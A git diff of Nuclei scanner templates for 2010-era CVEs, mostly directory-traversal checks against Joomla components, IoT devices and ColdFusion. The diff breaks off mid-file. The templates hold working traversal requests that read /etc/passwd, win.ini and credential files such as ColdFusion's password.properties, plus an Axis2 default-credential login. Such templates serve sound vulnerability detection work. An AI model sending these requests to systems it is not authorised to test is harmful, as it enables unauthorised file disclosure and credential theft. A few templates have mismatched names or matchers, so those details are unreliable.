diff --git a/nuclei-templates/CVE-2010/CVE-2010-1983.yaml b/nuclei-templates/CVE-2010/CVE-2010-1983.yaml
new file mode 100644
index 0000000000..48292064e9
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-1983.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-1983
+
+info:
+ name: Joomla! Component redTWITTER 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A drectory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12055
+ - https://www.cvedetails.com/cve/CVE-2010-1983
+ - http://packetstormsecurity.org/1004-exploits/joomlaredtwitter-lfi.txt
+ - http://www.exploit-db.com/exploits/12055
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-1983
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2033.yaml b/nuclei-templates/CVE-2010/CVE-2010-2033.yaml
new file mode 100644
index 0000000000..4e0eed3c3d
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-2033.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-2033
+
+info:
+ name: Joomla Percha Categories Tree 0.6 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
+ - https://www.cvedetails.com/cve/CVE-2010-2033
+ - http://secunia.com/advisories/39873
+ - http://www.securityfocus.com/bid/40244
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-2033
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2036.yaml b/nuclei-templates/CVE-2010/CVE-2010-2036.yaml
new file mode 100644
index 0000000000..26186a8afc
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-2036.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-2036
+
+info:
+ name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/34004
+ - https://www.cvedetails.com/cve/CVE-2010-2036
+ - http://packetstormsecurity.org/1005-exploits/joomlaperchafa-lfi.txt
+ - http://www.securityfocus.com/bid/40244
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-2036
+ tags: cve,cve2010,lfi,joomla
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2050.yaml b/nuclei-templates/CVE-2010/CVE-2010-2050.yaml
new file mode 100644
index 0000000000..2c6104b29d
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-2050.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-2050
+
+info:
+ name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12611
+ - https://www.cvedetails.com/cve/CVE-2010-2050
+ - http://www.securityfocus.com/bid/40185
+ - http://packetstormsecurity.org/1005-exploits/joomlamscomment-lfi.txt
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-2050
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2128.yaml b/nuclei-templates/CVE-2010/CVE-2010-2128.yaml
deleted file mode 100644
index 1237eb6309..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-2128.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: CVE-2010-2128
-
-info:
- name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12607
- - https://www.cvedetails.com/cve/CVE-2010-2128
- - http://secunia.com/advisories/39832
- - http://www.exploit-db.com/exploits/12607
- remediation: Upgrade to a supported version.
- classification:
- cve-id: CVE-2010-2128
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0:"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2307.yaml b/nuclei-templates/CVE-2010/CVE-2010-2307.yaml
new file mode 100644
index 0000000000..8ee4309fff
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-2307.yaml
@@ -0,0 +1,33 @@
+id: CVE-2010-2307
+
+info:
+ name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
+ reference:
+ - https://www.securityfocus.com/bid/40550/info
+ - https://nvd.nist.gov/vuln/detail/CVE-2010-2307
+ - http://www.osvdb.org/65249
+ - https://www.exploit-db.com/exploits/12865
+ remediation: Upgrade to a supported product version.
+ classification:
+ cve-id: CVE-2010-2307
+ tags: cve,cve2010,iot,lfi,motorola
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2680.yaml b/nuclei-templates/CVE-2010/CVE-2010-2680.yaml
new file mode 100644
index 0000000000..c7d3043166
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-2680.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-2680
+
+info:
+ name: Joomla! Component jesectionfinder - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/14064
+ - https://www.cvedetails.com/cve/CVE-2010-2680
+ - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt
+ - http://www.securityfocus.com/bid/41163
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-2680
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2857.yaml b/nuclei-templates/CVE-2010/CVE-2010-2857.yaml
new file mode 100644
index 0000000000..8450d34103
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-2857.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-2857
+
+info:
+ name: Joomla! Component Music Manager - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the cid parameter to album.html.
+ reference:
+ - https://www.exploit-db.com/exploits/14274
+ - https://www.cvedetails.com/cve/CVE-2010-2857
+ - http://www.securityfocus.com/bid/41485
+ - http://www.exploit-db.com/exploits/14274
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-2857
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-2861.yaml b/nuclei-templates/CVE-2010/CVE-2010-2861.yaml
new file mode 100644
index 0000000000..2c20cb936e
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-2861.yaml
@@ -0,0 +1,42 @@
+id: CVE-2010-2861
+
+info:
+ name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
+ author: pikpikcu
+ severity: high
+ description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.
+ reference:
+ - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
+ - http://www.adobe.com/support/security/bulletins/apsb10-18.html
+ - http://securityreason.com/securityalert/8148
+ remediation: Upgrade to a supported version.
+ classification:
+ cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
+ cvss-score: 7.5
+ cve-id: CVE-2010-2861
+ cwe-id: CWE-22
+ metadata:
+ max-request: 1
+ shodan-query: http.component:"Adobe ColdFusion"
+ tags: adobe,kev,vulhub,cve,cve2010,coldfusion,lfi
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "rdspassword="
+ - "encrypted="
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-3203.yaml b/nuclei-templates/CVE-2010/CVE-2010-3203.yaml
new file mode 100644
index 0000000000..17042d0b25
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-3203.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-3203
+
+info:
+ name: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/14845
+ - https://www.cvedetails.com/cve/CVE-2010-3203
+ - http://secunia.com/advisories/41187
+ - http://www.exploit-db.com/exploits/14845
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-3203
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-4231.yaml b/nuclei-templates/CVE-2010/CVE-2010-4231.yaml
new file mode 100644
index 0000000000..3c77231b1e
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-4231.yaml
@@ -0,0 +1,33 @@
+id: CVE-2010-4231
+
+info:
+ name: Camtron CMNC-200 IP Camera - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: The CMNC-200 IP Camera has a built-in web server that is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2010-4231
+ - https://www.exploit-db.com/exploits/15505
+ - https://www.trustwave.com/spiderlabs/advisories/TWSL2010-006.txt
+ - http://www.exploit-db.com/exploits/15505/
+ remediation: Upgrade to a supported product version.
+ classification:
+ cve-id: CVE-2010-4231
+ tags: cve,cve2010,iot,lfi,camera
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-4239.yaml b/nuclei-templates/CVE-2010/CVE-2010-4239.yaml
deleted file mode 100644
index 3b556de705..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-4239.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-id: CVE-2010-4239
-
-info:
- name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion
- author: 0x_akoko
- severity: high
- description: Tiki Wiki CMS Groupware 5.2 has Local File Inclusion
- reference:
- - https://www.cvedetails.com/cve/CVE-2010-4239
- - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.5
- cve-id: CVE-2010-4239
- cwe-id: CWE-20
- tags: cve,cve2010,tikiwiki,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"
-
- stop-at-first-match: true
- matchers:
- - type: word
- words:
- - "bit app support"
- - "fonts"
- - "extensions"
- condition: and
- part: body
diff --git a/nuclei-templates/CVE-2010/CVE-2010-4282.yaml b/nuclei-templates/CVE-2010/CVE-2010-4282.yaml
new file mode 100644
index 0000000000..527fe7df51
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-4282.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-4282
+
+info:
+ name: phpShowtime 2.0 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
+ reference:
+ - https://www.exploit-db.com/exploits/15643
+ - https://www.cvedetails.com/cve/CVE-2010-4282
+ - http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
+ - http://www.exploit-db.com/exploits/15643
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-4282
+ tags: cve,cve2010,lfi,joomla,phpshowtime
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-4719.yaml b/nuclei-templates/CVE-2010/CVE-2010-4719.yaml
deleted file mode 100644
index a9ab51ae4f..0000000000
--- a/nuclei-templates/CVE-2010/CVE-2010-4719.yaml
+++ /dev/null
@@ -1,34 +0,0 @@
-id: CVE-2010-4719
-
-info:
- name: Joomla! Component JRadio - Local File Inclusion
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/15749
- - https://www.cvedetails.com/cve/CVE-2010-4719
- - http://packetstormsecurity.org/files/view/96751/joomlajradio-lfi.txt
- - http://www.exploit-db.com/exploits/15749
- remediation: Upgrade to a supported version.
- classification:
- cve-id: CVE-2010-4719
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0:"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-4769.yaml b/nuclei-templates/CVE-2010/CVE-2010-4769.yaml
new file mode 100644
index 0000000000..3613fefedc
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-4769.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-4769
+
+info:
+ name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly unspecified other impacts via a .. (dot dot) in the task parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/15585
+ - https://www.cvedetails.com/cve/CVE-2010-4769
+ - http://secunia.com/advisories/42324
+ - http://www.securityfocus.com/bid/44992
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-4769
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/17
diff --git a/nuclei-templates/CVE-2010/CVE-2010-5286.yaml b/nuclei-templates/CVE-2010/CVE-2010-5286.yaml
new file mode 100644
index 0000000000..4513d4a5de
--- /dev/null
+++ b/nuclei-templates/CVE-2010/CVE-2010-5286.yaml
@@ -0,0 +1,34 @@
+id: CVE-2010-5286
+
+info:
+ name: Joomla! Component Jstore - 'Controller' Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/34837
+ - https://www.cvedetails.com/cve/CVE-2010-5286
+ - http://www.securityfocus.com/bid/44053
+ - http://packetstormsecurity.org/1010-exploits/joomlajstore-lfi.txt
+ remediation: Upgrade to a supported version.
+ classification:
+ cve-id: CVE-2010-5286
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/18
diff --git a/nuclei-templates/CVE-2010/cve-2010-0219.yaml b/nuclei-templates/CVE-2010/cve-2010-0219.yaml
new file mode 100644
index 0000000000..9e44b7dcc9
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-0219.yaml
@@ -0,0 +1,49 @@
+id: CVE-2010-0219
+
+info:
+ name: Apache Axis2 Default Login
+ author: pikpikcu
+ severity: high
+ description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
+ tags: cve,cve2010,axis,apache,default-login,axis2
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2010-0219
+ - https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
+ classification:
+ cve-id: CVE-2010-0219
+
+requests:
+ - raw:
+ - |
+ POST /axis2-admin/login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ loginUsername={{username}}&loginPassword={{password}}
+
+ - |
+ POST /axis2/axis2-admin/login HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ userName={{username}}&password={{password}}&submit=+Login+
+
+ payloads:
+ username:
+ - admin
+ password:
+ - axis2
+ attack: pitchfork
+
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - "Welcome to Axis2 Web Admin Module !!
"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/02
diff --git a/nuclei-templates/CVE-2010/CVE-2010-0467.yaml b/nuclei-templates/CVE-2010/cve-2010-0467.yaml
similarity index 100%
rename from nuclei-templates/CVE-2010/CVE-2010-0467.yaml
rename to nuclei-templates/CVE-2010/cve-2010-0467.yaml
diff --git a/nuclei-templates/CVE-2010/cve-2010-0759.yaml b/nuclei-templates/CVE-2010/cve-2010-0759.yaml
new file mode 100644
index 0000000000..85c6ddd98e
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-0759.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-0759
+
+info:
+ name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/11498
+ - https://www.cvedetails.com/cve/CVE-2010-0759
+ tags: cve,cve2010,joomla,lfi,plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-0942.yaml b/nuclei-templates/CVE-2010/cve-2010-0942.yaml
new file mode 100644
index 0000000000..f5d69afbca
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-0942.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-0942
+
+info:
+ name: Joomla! Component com_jvideodirect - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/11089
+ - https://www.cvedetails.com/cve/CVE-2010-0942
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-0972.yaml b/nuclei-templates/CVE-2010/cve-2010-0972.yaml
new file mode 100644
index 0000000000..10db45dc6c
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-0972.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-0972
+
+info:
+ name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/11738
+ - https://www.cvedetails.com/cve/CVE-2010-0972
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-0982.yaml b/nuclei-templates/CVE-2010/cve-2010-0982.yaml
new file mode 100644
index 0000000000..9fa799d4c8
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-0982.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-0982
+
+info:
+ name: Joomla! Component com_cartweberp - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/10942
+ - https://www.cvedetails.com/cve/CVE-2010-0982
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-0985.yaml b/nuclei-templates/CVE-2010/cve-2010-0985.yaml
deleted file mode 100644
index 8a68ba32ca..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-0985.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-0985
-
-info:
- name: Joomla! Component com_abbrev - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/10948
- - https://www.cvedetails.com/cve/CVE-2010-0985
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1081.yaml b/nuclei-templates/CVE-2010/cve-2010-1081.yaml
deleted file mode 100644
index 39650b4327..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1081.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1081
-
-info:
- name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/11511
- - https://www.cvedetails.com/cve/CVE-2010-1081
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-1217.yaml b/nuclei-templates/CVE-2010/cve-2010-1217.yaml
deleted file mode 100644
index a16a2b9e55..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1217.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1217
-
-info:
- name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
- reference:
- - https://www.exploit-db.com/exploits/11814
- - https://www.cvedetails.com/cve/CVE-2010-1217
- tags: cve,cve2010,joomla,lfi,plugin
-
-requests:
- - method: GET
- path:
